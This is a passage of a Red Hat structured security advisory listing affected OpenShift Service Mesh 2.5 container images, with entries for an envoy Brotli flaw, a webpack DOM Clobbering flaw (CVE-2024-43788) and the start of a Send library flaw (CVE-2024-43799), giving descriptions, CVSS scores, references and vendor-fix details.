"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: Brotli decompressor infinite loop", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, 